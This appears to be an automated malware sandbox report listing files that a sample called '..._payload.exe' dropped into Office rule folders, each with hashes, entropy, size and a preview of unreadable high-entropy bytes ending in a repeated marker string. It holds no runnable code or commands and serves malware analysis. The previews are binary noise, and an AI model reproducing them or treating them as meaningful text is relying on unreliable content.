                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):966
                                                                                                                          Entropy (8bit):7.751831536969698
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:qyiHR4sENBD6ECz3NQ0f7QFLaznD+PQccbD:q74tBDLCz3VjzmJ2D
                                                                                                                          MD5:1967278F4A73933FD7890B5FAE955B3D
                                                                                                                          SHA1:4688ADBAEF32EB01BD23C3806D71CAEDDE9B41FE
                                                                                                                          SHA-256:5CF7207EA22B8C7F76E85B66C59F82CE9484B5C1866BBE82104FC2F7E695BAE5
                                                                                                                          SHA-512:371B2B0CB389A0026AADE39DD79238C1AB944F6BD8502B13E7B7FE20C119FB0C4E3B50FA826B0022A05A899DEC9E10E0CB9AE9E8214E6A17F0C2F89B42818D71
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?*...@..+2.W..o.0oVH.Mda.B...AOu..A...Y.<...<].~...E.F.Ajmq.?nc.MJ.l.....<hE@..f...p>....zp.n;?YhS {.x...}...*j..=..,.J.t....fS.!.i=T^.'.#.]b......L...1..8.4......u?..E2..j..I...a<....?...zT.U.w.j$...+7.v.k....[.....k.....sckv..|.-..=.y.^.n.....!.H#.....u.iR....q......s_g..^2).....}.-C.......i.jj.QW"....SP6KN+. [IU.d.w.q..p.'...M..?A....U.QK.u.qO...n[B.U.9.M..3.!..=W.v..?A~...^,6..Q.h...q.)....q.JE..!.Tq.`*.\.<s.7..Z..|..={.......>...b.x-.*(.s.[M.....:..T..v..d>..%....Qk.u..:...m)...=..%.n"...0r.*..a...........'.:....7......,......rQ.b.3s.......jb...2.Csa...D....y...KS.. ^...+Z.]gS...h.F....gG...s......A.6.45.cM.E..Wv...)H3eH.. "vX....0..).<q._..).,..Tj..a7...x.eY*,....D...K.\`.7...rwtF.......-T.3..T.O*..F..r.Ri.w.....=.8.Q+Is.q.....p.?#..8B.."h1.;m3.Vf...PT.pB..?. .G.buK.?=GB..Na.#.o....i....\Hx./&...W...=Qt......'.3.L...tw.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120614v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.723251374003349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:dTh6hJk/HQ65jclDjQJ29yWp70A/Ptp6VaT7e9+bD:u2PQI4Bs52gcP6Vae6D
                                                                                                                          MD5:E11C8A0BC82995281DDA1DE141DD7FCA
                                                                                                                          SHA1:0294E047470C334863C4B9E0DB01D3CC6439DA5D
                                                                                                                          SHA-256:AC29E39EC93ACD5A1B73AFA53A0A38D35994DF826BB0EF10D8B0E52ED1009E74
                                                                                                                          SHA-512:23DC24B0237EB28AF00C8CECBB9D1E26B75445FE24BC1C479EBECCC479ABEB37F6886517A265519E1E86C546887EE220C5973020F31FD5B12515D896CD0DB6BC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?m...}....u..r....y`s...d:.Z....x.fU..3.s.`...iW.[....m.s...I.A.9....8.qr.....&#..}......h.n..b.v.$9..Do.u.....r...3c)6..%M.&.49QN.=...t+._. .....q....Gn.Y..s.:o.R..9I..4.u........qEL....|....P...X..+?....F...+..|1~.v..w5...O...........0s"...n.u...q6U.v..DJj.0.v..............U....J.3'..x.!.in."9.....c.-.."5d...D.l......cRM .<5P..Y./S....y.(.(}r.A.=....B....H............]...5\d;...H.j..@[.... .R.....+.......b.*.s.....2..7@?..d)..[....Cg(.d....xI....b.......'...R...........P..O@l.%>...n.L.{*7~;ZM.:..EN7@..H.....19.xC.......5dm....."..WRa_r@.8$._..pv....C>G..\....t(....[..)!/S.s.R..^.{,...k5I...F'...L...v.p.h8..q..q.*;.C. .)....8......6....{..o.x.mV....)....;..T.y.x.m..X..$dZ3.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120615v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):741
                                                                                                                          Entropy (8bit):7.688281851003057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:NfSASyaMaPIpyzhIbGmv6QT+BcJN4ybsQVk4iTKJ5x3rM7D6ok02+Qp1DEr+1inv:wASyaMDgCbGmv4Bq4Ms1q5Zr/okJKr+a
                                                                                                                          MD5:E75FE5EF8C375A2D1110A810C129E0F5
                                                                                                                          SHA1:82919681F56B4AEFE483F0E624899BDC665B7D21
                                                                                                                          SHA-256:A87E16A74082C57C917CDB2005DA91FE45F4AFEF02235A5DDF47A2A37BF23C4C
                                                                                                                          SHA-512:21F87F23EC674F94C5E626B6DCD136451345A665FBBBA0C560684A98B376AAACD113090A9959CCD00BA66E9FC135F1F1B30A0032C2034672A167193AA99FDC42
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..r...x..t.......A.xf..z...G ->..S]./...=...r.TF.......:[\..TPd8.2...,x.mA..."..s|.s;.}...;.:..)....h.*.3p..F....A...<&..7.!{...E......y..b,.a.....9k.].r..f.g..E..n..B=.....#.<.2F.$..)....,.\.......V.,..c...?.|..._@.pL.....L..vv..v".Jqa....L.......Mp...v.]7.-F..u..v3m:.l.3.TR..+.......#..R.?Z......~.&A..."....//....#.....p......?...'c..<.^[.gL...3..-B.^...5K.X.t?...6..P.....2.F...G.5..........u~<v6..M....=..>..]~S....1.'.5..C.n..@23...8..`...3.#$]q.$....p......s..5q.w.}......Y..$W.L{..*`..c..".L......V.., .l.2....X.YG..k6..ZA...L(z..,L...B.I....Taf.9f.m..~`...].&(.<..4....m.s.eH..y....A...=.....1.\W.....[.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120616v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):820
                                                                                                                          Entropy (8bit):7.769111167638599
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:j6Gxn65cbXEsnnJdFQ6l4YLKRBS49XyWR1P1aaautoDizsMKXr+jzq5bTcii9a:eY6CDEk+6l4YLKv9XyWR6a7tiS6rcGbD
                                                                                                                          MD5:71100C99AD937E459FB07767E514C278
                                                                                                                          SHA1:AF72F093956EA1486D40C9CC5A47DD96934657C9
                                                                                                                          SHA-256:769F1D6184088461317FECF71087220DB60CAE6CBD63CFF3AEB64D7F5C19545F
                                                                                                                          SHA-512:3A449DEF58446CD79ABEE70E86A33559C97DC46F0FD63544C970A025C910BA23EE3F6ED0D54B1474CDB23CCF4307FD86F63463C830AE943D80581004E47486F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.......Q.s._L..F9.q.....-.f.uDJ&%..Un.).......>.G..~8...t..L/..l.A_.Q...&..b[T?..~ ...........y....a$"..S8....-.t...u......mg..[.Kx....i...+..gM..pb.6.Tj.+9UV..&.,.%.......$-<...\......j.o.vD.?.A@}l.Z6......?..:.E.FS.u/yO_......3.....j=...:....PxZ..).......i..'......{^{..7..Dx.K.7.2..B.3).d...H.8...Vso..Xn......&j6i.....e..Qn....Wr.I_......!.\8.....z).c.+...b.Q.e.|.....k:.p....w..Zg`..%d.`.......+Ien...[..I.ep.'b.....Cy.GAKb..qb.`.. -*...5....D<NC.J..~.m.7.Ys...."g...2y..G....n....C`j1(.U.x.....C..nq./.T;~..56.w:..."..D.......ld.Z...}.E...$@.[.l......Z:,..e..#.+..T........o?........4.<.!.~.Qkt..An...`8.xe...>.'......F..&..c..`B..V4!l`...].v.."....:..k.K...Y..H.x....>...{1... ..Q.(..I..^nC.7.@.FphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120619v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):741
                                                                                                                          Entropy (8bit):7.642684407036575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KosXpwp1PvtK3r2IVTBDcaBl4MSL6Oh0eLzU8QLC4PuMsaykoPypTsclIq5bTciD:KoGwzVaiAlzYN/88Qu4PrsaQPydsupbD
                                                                                                                          MD5:3B5ABBEA2202A577A41AED445BDA21FE
                                                                                                                          SHA1:6E10879A67170982AFA92432DD2FF4CF0EC0B726
                                                                                                                          SHA-256:81ED7652C7E1F1B16418FC4371F343A8B00B50B5E94EED93363B46A89B4C2E8C
                                                                                                                          SHA-512:8E511240D00CB1B57412CAC6ED5C728C26BDF6A4721FB630C98A31F7DFD8AD096ADCA27E56B6C8FBD99588F2A085209A0EEC471F61FB42F5DB9F53BAC19553F3
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?O.t.W. sp$fy5.#k.::=.0X^.Xi.w.yB.#.....o..P.!......m.b....f....{.F/.qyL.L.LP...K................#k.MP<.....(....S....g.Q....y..d..v...h.(.7..\.^"z..q...../_7.#O..f......u .GF...m....0...F.4..]B.oL..9...g'.C.P...z.V.m...|..U...wU..]6mv..........=X4.`.Y......b.j...D..".L...v.......+K!}.q..].(W.F.>..u0._~...R.....w.v.#..e@....t......ikcGf.zB.z.h....;\........Z.Cn..u..(H?.......|.C].B.@._@.......:..XvRx],.2.....0i....4^CZ.z.....C..i....Qi.^.q6U..@.H..]...<}i..#....*g.{..m4v$].vf.W.Mpim:."...@+....ow.3.rz.F......t/..9.>j....[.....no.S=...Z.{...t.=k[.".......ur...J..4.. .B9.!.gOQ..R...._.e7..'........y..@.)6..Od..U..2...1S)R.F.N...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120626v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):806
                                                                                                                          Entropy (8bit):7.720949813337629
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:qA5ZSv0otMuovmiT+2g3vrVXOv7xLE2/QlWX+Hm8nTDZ1wq5bTcii9a:lUnovmiT+2oZXOv7xD+HLnvBbD
                                                                                                                          MD5:2BBD36D7B2E6ADA25FDB42F91214F0B8
                                                                                                                          SHA1:300101739B84D6AE3645E3F9B14A6B27E65F8D41
                                                                                                                          SHA-256:62CD89A6CFCFFF495DD5409BD08E33A0288D22792C004604D98BEC8FC0A84B9A
                                                                                                                          SHA-512:6BDCBCB5F0DC1B3DCE0E664F89504BF082A4E0FFF4E98DD7483A98C5C97FDF235633F8043AD509AC9AFD51FD6006DD17AF0A2D38AC2918FBB1D25CDC01694867
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.8`.C...........QuN...,..%P."...>qt.9#.e..Y1..[.N......E...:......z..7).. +l...6.#)....@.)...U.~..T.D..4d...."....L..I..7..@.......)..{(.7h..:...... .bO.K.r...S.zP.,gTwg....&....Z$...H[>..J.7.D2.l#.E.`....-..?)4...A.'Gx{Y.D.......N?}.....>.....TOVpn...T..rF.o.h....[H0...W.SOEl.2...E[..w..wT...9[ "7........3.P.y.(R.....wK.h.Z*..W.&..<..}s.y..$....a...>.w...="..y.....,x.l.~q........w......%..Xw.....%....d....H..?.t*g...\.....W..t6.Ss........3.g.^.3>..~. ..O..J....H......H".7.i..&.v.Gv.:*..D.S^;.....5.+D..7..v.&?...t`j0..I.|s.\..3..V(.`B.(..5.Ha...........+.>.p....^.....O....<9:....E8.J...#....L..^....!.f.q.........]....`#...S............n.5.....(.........q..IU6...u?..8Mq...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule120627v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):738
                                                                                                                          Entropy (8bit):7.680245920469461
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:mK3mC4G++kAtgGq94oMU1rTrfrvw5FRs0T5EVnTaYvkVYU0Rz0BLq5bTcii9a:mK3XJJoMgvfk5tWVP4Ez0B+bD
                                                                                                                          MD5:4B38F5A03C29F6A4684E4E8037FF1959
                                                                                                                          SHA1:11571B40A2E2A3BEBD9EFE59DF9E1F06661A4551
                                                                                                                          SHA-256:DF6AE9A884804AB63768EBF148FFC76A441E98EED22AA5D40366915EF4383643
                                                                                                                          SHA-512:2F9381D67C465CB9014388B49598E62E04D219997B2258B3D941104EA73BCAA6A945E13E5FB6302DD9ECA3946256B85CAB9615185130BAF2E2BA521CC9E12B6F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?p0..........6s<..9......G~.c.4.7'..GL20........)..k.....eR0..l.[G(...T.,.v#W.g.t|.y...C\..%.|....8.(k@ .2....@..).ay*....e..9U..q.@.e........~..bJ.++oTt.JX.P.......;9.yP..uTE-..e_.Q..j[.N.....|.EK...Q....5.....^....a...Bn.@+.:1..@5.....j."........k..S....Y..e.WG.........q`.$<...J...$d.Hn:..2D.F..3.^...|V..4Ys...eh...p8...4..B..K.T....Pd.p..Rj#.Jo..9..V..I.t.{...T...'...*.....{..p.n.Q...'......uW....F.....$.._.4....p.!..*bo....Q..Q..9.Z!..w...p.z...6VBy.....=@D.m.T.{.......M...k....u?... .H.W/#`d~...@.."@zjB.2wPQ<...i.d..?.t...8TRl....~..P..5BnYe..d..V...:.M&....H..=j.J..xx.....6.6M.Ee...f.xZE...kQ.WH/.sphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703350v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.874401414236678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:t7lOO6Tu0P2642M3z44DctF5nT0OnIvfB1RzD:VlOOmu01feNSFaOnIR1V
                                                                                                                          MD5:3B97E23733AB0BA214B9A003E49BAF5F
                                                                                                                          SHA1:C75C1710D3660FDD3C053AA1CCB332E58A87A3C2
                                                                                                                          SHA-256:150B2380D9E1674CC42A5F160D038A6B9466EEC617A30D6BB1D156AFF8CD478E
                                                                                                                          SHA-512:2D5DEAC99BA5358F3AC30EDFAD5843DFD4C3DFEAEC2214A2909DC36964407395A1891B50BF0290D511DB7768CE5628646F54F8E9AAD961D11639559CE1741B43
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?. h..J....#...,..Z... .a....)..X.)....\..U.....}.!.._.VQ..........q..pG;.&.;......F...."..a8....K...~oK......&.,..............Zr...#pD9..n...;x z....nu.#.=.*.G..L.&..6...].P./z...!.oe.2....j.Ma[.E.h.8.....1e.F..I.|>=.0......B.B..HQ.TX..4....{g...Z.B9yj..c.W..?..\h.....'\Z..L.t.Ry...l......M6....l..Q.X..;.i.......W-y.....g..7.......K..n..&.....y.].Y...3.3D.K|.....j.To...*.l.m&>...w.7A.....[..P........-..R.?8[h...F.l..M8.`W)"=E.=p7jL....-.H.%B..WkJ.?..m...oH|e.._.Ya.... .S.q.......WA[.D.V...<t.....2.... ..P...o......9..;.8...Bp...> ........[.d*.`....F.....'.f.,P9.FK..yy0....{.Z..Z=.w...V(B...Bl..{.. ..a.&...a@....d..?...lg.Q..E...?I\'..3X'...x.......[hS.I[..<.(|...".....{..Ly(..3_....G+N.wF.....V..h..!......=@z..K..5..........U.;..J.."<......va.5b.V..M...x,m~...K....\h.Z.te....j..}....yh....r)'.k.....E~....,..).f|../'r...o.2...G...l$..R....f...t......Q@...lTe/.....1.H.w..94..(@..S9.R.j...f..i|........&.*Q....!V.y.HY

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703351v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.882089850359995
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:D4bFYJGPrmd5dcGFRMKRIk1cx/Btex02OD:0hYoPrmRHvXKbsA
                                                                                                                          MD5:C382BEF9415AB8F3449CAB989AA2A002
                                                                                                                          SHA1:8730C4B750EFCC6BF3AEEAF55ADB7D983AF5E336
                                                                                                                          SHA-256:EDA6F72460672D15152DC0E2FA54C23C80C5380C78E702A1744D7E1FF0DF4B5F
                                                                                                                          SHA-512:F5FCF05157E32FC24686679695FD33BFE12BB249CB78A04CB35CD09F8C0B08861CDC2EB7B0458DB4402B8864ADDDF21339BAF501EF9DB3FE1C9DAE121513676E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.H.'.v.f.0.Y.s;.6.............X....t.)."F...!.U}.m....M..S(.:.gy|^..@.....v.F..GC..\I1..p8#.:I.....)..5e..R].`....q...3...H.B.Z3.3..$..d..B.C.@..l'..H.6......P..5."...7..H........&..a.7...~v..e.e_b<.L.."...{.y..J..S......'(\+N..P.&P^..Y.yQW....e..)..=z..d....)B.W...u.?:./q.....:.......[6.Kh...!....yB.....r.3.S.8._....{s."..].i....6..4`.@J..G....jU.wt.G....1T..O7.{.Q.H..&N.9.<..wg....$#.|.9.Yz. ....Z.U...."!..p.l.&<E..........a..m.....H..-...G.t...":V!0.=.&|.....%|.H.....G....%.....6....l..6e:.A(.{J....p(..0s.3..J....0h.Y..s....S#;'.ei.E...[.l.a.$r.]&<z-..6.......Q.jZq..F..4.o..M...K.....8......y../..}.%{b.*.z.....W~.0.Y.._s7.1...N.Z..qL......Q=h{...Q..l....A.E<{..1@ns....D...E!........."h.....c..y3.j5...+:..e.I.|4i...:.k.+.iW3.~.-..vL.C.wT.!ZN,.....M...."w...;....8.j.$8..ty...x...F;.k..=..^.*.q..'o...$a.z...F......7h.R..._3.....g..n8G.$.Z.D....z......W..r..].n<.......E&D(A.......k..E...zy..1...]...bqf.q.@~d..r.,....i...%.S...OfT.v.Q<^.B)8

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703400v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1722
                                                                                                                          Entropy (8bit):7.889974313455084
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XhIR//c7UX9LNL1ZE3Lr5GfpLB4hOpR0/odd+AvqKhTrIQoKjAhJcKI2RNuu63bf:X57U5NJppF4X0hqKhXIfKjAfcZNu63fD
                                                                                                                          MD5:299C69B35EEAF7DF45535E776A9826D5
                                                                                                                          SHA1:150C4A1B653074D0DCE22474450AF1E85923D8AF
                                                                                                                          SHA-256:E206F98A3A751FCD59E3DFCE53137FEC78C55C326FD1B4A4AF6A02AA5E699F8A
                                                                                                                          SHA-512:751250D044ACA038816CD60B357403AE2545A1CC524C647B34D6993AA99F8C089530D2013EBFE152066BC23B8ACADBFD4E11C91FE554D82015B25C9F8E25022E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?U..O..._kp..2B..+x...J.......2.X....,.'...r.*4.....D(..T4^.'./...-..y].R.$....t;Z{F,e....2.W.9L.,.H...Q,.`..-..c>@G...`..9._...iz1..X........A.......-. b:...X+..g.y.R...h..QF... .9..pw.q....0....w..`.....QR....I.K..x.%...yM........`..g...9....T.w.d$.i..j...y..Y!..).2o=......+:+...}*>.H&%...V...2._>*.|5.hd...o.."...I.T.b.#..n.....F..f...g.#.......z8..g..7.......i}.8\.X.o1%P..-E.....X..8Y....B..w..y.E.F...~.o..e<..Dn..x....1hF.HLXR"we>T.x.z.|...i/.0..R....`..Z..Gv..5.pl.."....V.....s...=.n...._e..........&......X..../..h\..[S..x..NI3..B.._.K.....5a...S.b..(........|.l...@*v7=$......kFH..0x.btR.;T..s...IOy..n_|..'-.q..MW0\".t$.......gj.jn?.|RG........V.......zS*..UHBb..w.up.Jt.g.(G?ml....5.x.?.i..I......<;....{.*.....7..........T..n...o..\.2.lqG.......P....@..~.`+..f...j..,{b..g.(....0?..R.~...!.~..1hC.0..'f...$d..C>..[$6p....uD.Vx.-..l.B.....!(...{.C{|.W..u......d.....I.....j.]...W..A..1Z..R.xn..^H1<...9.Z..z......q....h..u....A..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703401v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1759
                                                                                                                          Entropy (8bit):7.893312813579403
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:LelLjhZnrKKZbg9yN4kZUYJMtzwoS1MA3X28XD:YLLnrKKNoKoS193X2e
                                                                                                                          MD5:528CEF7A1EE63B3AD65092CE2F0F8471
                                                                                                                          SHA1:4255A908AF7A3E6497D17EEDC28950010FDB6889
                                                                                                                          SHA-256:611F829EC660D05261CD900F5721B20EFE7B0A9A51C513BF795506012FE2B298
                                                                                                                          SHA-512:A1E24CCE47766F111BE0A14220996F6B9641E556CB32E9743A8CB02BA0FA741F41AA7E1679E9843EDC7DC262FDF4807CDF9940CBFBB08326E2E0081A2A0C1CC1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..*M.0...Y./* .\...$1_!...C..E..#.t.x.%...0H.=....:.....h.S2..(5t..S....C....<....X....s.J........$3*...;.I.j...}....\..{...5.(.!.l....U...l.C...).*.R....I'O.7H.f.+..........tZ+P...*.......<.~..V.y.#G..DL.v.A:....A.0.>.^...V...Zf....d.).E.;.D%..........Z.Sk_.k..V"U..T*.%<?^....QS.>N]z.P '..........7c.]..h}..D.V..H....V.K...gN.9..G.s...b....T....h.+..-..Li....K$.'``J....0|f..~.........}}A........}.<|].........r..f.M..a}.*...zi;..`p........7.yJ..>..^.e..Q...2%.q4F........O9......./.,;s..4....n..M,.`P..N8.X....vT.nv=.aq..~..$.Q...$w.\j.z_.Xv.E.....s...'hu...C.9.K...nP....W.8..;.#..\.iW...r]..Nj..=..M.a)......3E...mm..K.g{.^2.......`7....d.....5.'..@.......A....T.C......f.f..RL....S>+S_.!.kq.L6..G.jz..x.......Y.S.8.....!....B.8..LvZ.Wru*U..K.On..ON[..|.,o.LE.nn.P..'8n.0..8..8g.T^..Nt.........c...Fu..{./..I..... ..........].......?../.y........X.$A.x..4.._c..9S..h...|.Ex[K.u.`.....gK......A.. ...aY.D...{..(.E..h;.|.X84bV..@m

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703450v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1706
                                                                                                                          Entropy (8bit):7.876049185450772
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:aVBGX1Yzl14eDBZPmt1sgX1Wk5E04YYMD:amOBqEgok5jv
                                                                                                                          MD5:633AFBD1B6C25423965AE5F56E25776F
                                                                                                                          SHA1:7D13FC977019286397827957D7CFCC4A91A5BA3B
                                                                                                                          SHA-256:7C197DBE161934A5F1E50997A47A275CCF5A3ACC4B74392D7CB400D4B530CE9B
                                                                                                                          SHA-512:7378BFFAD705DA919D960B4E380624184677A48E9424DCE5FBD66807F67C92F63A006E9D3CFB277D4E9392CE24C0956DA1AC488BFDBE34157CBDA91FED1721FC
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..r..%..V...n'.....ZO=.....t.P....t-\x0q...........fE=s..H.M...]..).J.ohe.m...V..^....fD..T....f"........^u....aM..y..Q.....u.U.;j...|..W{vg.v.M.h.......fb1..Cstc..@.".pO<.....a...._.eg.....ta..$.?.9?..uv%..`08...._..xT..>_..eX.....t@..y....Y..@q.8s.._...N....=.U.u.p.hs.....<Q.../:T.M.\.@..g*...)..L..W..#)A.H*...+...M.7.wr......8.N`..t..7..=.?....8.v.O..j....K.....L/...`..io:`).../(..>.....CjL...%.1^\5#}_.W.Y;0.....e....V.....g..a..MYT.f7..w.$}.M!.x...H*/..>.....X.K..%.|..})A!...[.E...4.=.[z .....pp.s..a.u$^..f!.....;.S...=./%.3........FR.m*.)..v.....5....X..5...D..&WB-...7.P.M......0.T./.\...Re...KK.~P.......4...t..H......dM...~......%(...)J5..."...^P.&..N......k.%..ba..!O......w%&._.C..}..".>rt..i.....I.....TV.`u...@.....p.}..A"...1...L.Q.....(...t*..URA...c....?L.T..f..$.eK.'.?...O...|Y.$P..0..J......1C.yYP....6.R.u.....-kK......Fj...>b.7._E.I..I~..C#..P.bm... k!#"e}.3.w.3...j.?..3..T.`.;..%5dFh.x%.|.2.d.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703451v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1743
                                                                                                                          Entropy (8bit):7.88713339645359
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CaDwrLd1uiboXv+v0qIwUqqWaMdB+8eH8vZD:C6W2vC0qIwUqAy+de
                                                                                                                          MD5:9BEAA3329C741AF533A98684EE975E34
                                                                                                                          SHA1:51F2EAD06FA348C4F07671C3C8897A96482F4A91
                                                                                                                          SHA-256:878B97B1C5F6E2B499C9A4349E26F84E07FCCE1E98BABCBD3D1528AB50ACE7E9
                                                                                                                          SHA-512:D57B27E4D48BA217D742CEE5EF2582CE711DA5D3C9A156FE1596111C0754F71EEB82582A179240140CF5670ECA1CC2E1E16B4070F908611B66687F45CAF78A47
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...`..@.!'S......F...oA...Z.m.d,...B}....PX./.........k..$.L.`.6...B...%..{.f.r..=...)u......c.....>3.U}.......(.....@P..f.v..hC...X_.#.......o.I...yg..\}.....W.J.'....D...hwF.AF..C..%..a}#?&.k...44.zDg....`.(...H.`.6Q?...s.h.-MS ..:....0..t.|...f<....^..r,H.Q.e+.&.g...5.:...C.o.s..P.bN.......==A....I..)....,..B.<.`2C.,....`.-. 8.........B...T....[t..(5...~7..vk/...Qi.!1B.hM.4..."v.f.:C.0]D...A.....O=....`s.(......o...}..).t..u.+4..l....Wz..5.J......9...R.;..UYk.....Ub[y...*....~W..YX.;.......?I.]...c......I.B.cE.5...K[.b.R..5j/.X......YC..R..L.....D.h..t..{.].#...S.D......G-.tQ..\.."/...{.....\0..W.L......B.......n>..kH..^.Oi....Df...r".r.....MG.D......n..rX. #S..q....a...q@.........u...j......Y...y.h.^B11...........:^.....F...tcV....3q.R...9M.r5ad.5.....8aGs6.............K.P}..Z...w...6.......~Q./5.f_".r..p..:..D~#O.3*e...d.h?F..=.L.C.V...o.Y....A.[.!....V0...Q.~.+q...R.A..>2.i..S...1YoW.......9PT.R....D.gz..Px...'.".T.i

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703500v0.xml

                                                                                                                          Download File
